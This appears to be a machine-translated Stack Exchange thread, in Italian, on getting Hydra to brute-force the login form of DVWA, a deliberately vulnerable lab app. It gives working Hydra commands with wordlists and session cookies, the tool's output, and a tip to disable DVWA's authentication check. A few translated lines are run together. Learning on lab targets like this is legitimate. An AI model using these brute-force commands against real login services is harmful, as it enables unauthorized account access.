Perché Hydra restituisce 16 password valide quando nessuna è valida?

23

Ho giocato con Hydra e DVWA e ho avuto un po 'di intoppo - Hydra risponde lasciando so che le prime 16 password nel mio elenco di password sono corrette quando nessuna di esse è.

Suppongo che si tratti di un errore di sintassi, ma non sono sicuro che qualcuno lo abbia mai visto prima. Ho seguito diversi tutorial senza fortuna, quindi spero che qualcuno possa aiutarti.

Sintassi:

hydra 192.168.88.196 -l admin -P /root/lower http-get-form "/dvwa/vulnerabilities/brute/index.php:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect."

Output

Hydra v7.3 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2013-06-05 22:30:51
[DATA] 16 tasks, 1 server, 815 login tries (l:1/p:815), ~50 tries per task
[DATA] attacking service http-get-form on port 80
[80][www-form] host: 192.168.88.196   login: admin   password: adrianna
[STATUS] attack finished for 192.168.88.196 (waiting for children to finish)
[80][www-form] host: 192.168.88.196   login: admin   password: adrian
[80][www-form] host: 192.168.88.196   login: admin   password: aerobics
[80][www-form] host: 192.168.88.196   login: admin   password: academic
[80][www-form] host: 192.168.88.196   login: admin   password: access
[80][www-form] host: 192.168.88.196   login: admin   password: abc
[80][www-form] host: 192.168.88.196   login: admin   password: admin
[80][www-form] host: 192.168.88.196   login: admin   password: academia
[80][www-form] host: 192.168.88.196   login: admin   password: albatross
[80][www-form] host: 192.168.88.196   login: admin   password: alex
[80][www-form] host: 192.168.88.196   login: admin   password: airplane
[80][www-form] host: 192.168.88.196   login: admin   password: albany
[80][www-form] host: 192.168.88.196   login: admin   password: ada
[80][www-form] host: 192.168.88.196   login: admin   password: aaa
[80][www-form] host: 192.168.88.196   login: admin   password: albert
[80][www-form] host: 192.168.88.196   login: admin   password: alexander
1 of 1 target successfuly completed, 16 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2013-06-05 22:30:51

Modifica

Ho avuto successo nel forzare bruto le credenziali di amministratore. Una volta effettuato l'autenticazione con DVWA, avevo bisogno di trovare le informazioni sui cookie (facilmente eseguibili tramite il browser o la Suite Burp). Una volta ricevute le informazioni sui cookie, ho emesso il seguente comando che funzionava.

hydra 192.168.88.196 -l admin -P /root/lower http-get-form "/dvwa/vulnerabilities/brute/index.php:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie: security;low;PHPSESSID=<value for PHP SESSID cookie"
    
posta DKNUCKLES 06.06.2013 - 04:38
fonte

3 risposte

23

Lo stesso problema mi è successo quando stavo giocando con DVWA. Il motivo è che stai provando a forzare YOUR_SERVER/dvwa/vulnerabilities/brute/index.php forza che ha bisogno di autenticazione. Prova a visitare quella pagina nel tuo browser e ti verrà richiesto di inserire un nome utente e una password (forma diversa da quella che stai cercando di forzare)

Quindi mentre stai provando a forzare la forza bruta:

Hydrastaeffettivamente"vedendo" questo:

Nelsecondomodulononriceveraiilmessaggio"Nome utente e / o password errati." , che hai detto a Hydra di usare per distinguere tra accessi falliti e riusciti. Hydra non vede quel messaggio di accesso fallito, quindi si presume che l'accesso abbia avuto successo.

Quindi è necessario accedere utilizzando un browser, ottenere il cookie di sessione (per impostazione predefinita, PHPSESSID ) e alimentarlo a Hydra, e allora Hydra sarà in grado di "vedere" il primo modulo.

Si suppone che tu possa impostare il cookie nelle intestazioni HTTP in Hydra facendo H=Cookie:NAME=VALUE o puntando Hydra in un file che imposta il cookie facendo C=/path/to/file . Sfortunatamente, non di questi ha funzionato per me.

Dopo essermi frustrato, ho finito per commentare Line: 5 ( dvwaPageStartup ) nel file /dvwa/vulnerabilities/brute/index.php , che ha permesso a Hydra di vedere il modulo di accesso vulnerabile effettivo.

    
risposta data 06.06.2013 - 09:53
fonte
3

Questo è ciò che ha funzionato per me:

hydra 192.168.56.2 -l admin -P /home/user/Downloads/pass.txt http-get-form "/vulnerabilities/brute/index.php:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie: security=low;PHPSESSID=n5ggv5f2b3vcrl9fe15nqu6v95"

    
risposta data 31.07.2013 - 15:13
fonte
2

Sembra che Hydra sia molto implacabile quando si tratta di sintassi. Puoi utilizzare il formato "URL like" per specificare il modulo, l'host e il percorso.

Mi ci è voluto un po 'per arrivarci, ma questo è ciò che ha funzionato per me ( hackme è l'host):

hydra -V -l smithy -P /usr/share/wordlists/rockyou.txt "http-get-form://hackme/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=incorrect:H=Cookie: PHPSESSID=07b7ebb2faea96f8471ecdb759e68108; security=low"

Modifica aprile 2015

Sembra che lo abbiano cambiato e il formato sopra non funziona più. Tuttavia, questo è accettato:

hydra hackme -V -l smithy -P /usr/share/wordlists/rockyou.txt http-get-form "/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=incorrect:H=Cookie: PHPSESSID=07b7ebb2faea96f8471ecdb759e68108; security=low"

Il trucco per cui mi sono innamorato è stato spendere così tanto tempo nel debugging che il mio ID sessione PHP era scaduto. Una volta aggiornato, ha iniziato a funzionare.

L'altro trucco era quando stavo eseguendo il debug usando Wireshark - stavo prendendo la prima richiesta HTTP e mi chiedevo perché i parametri username e password non fossero passati. Sembra che Hydra faccia una richiesta HTTP all'URL senza parametri prima.

    
risposta data 27.02.2015 - 15:34
fonte

Leggi altre domande sui tag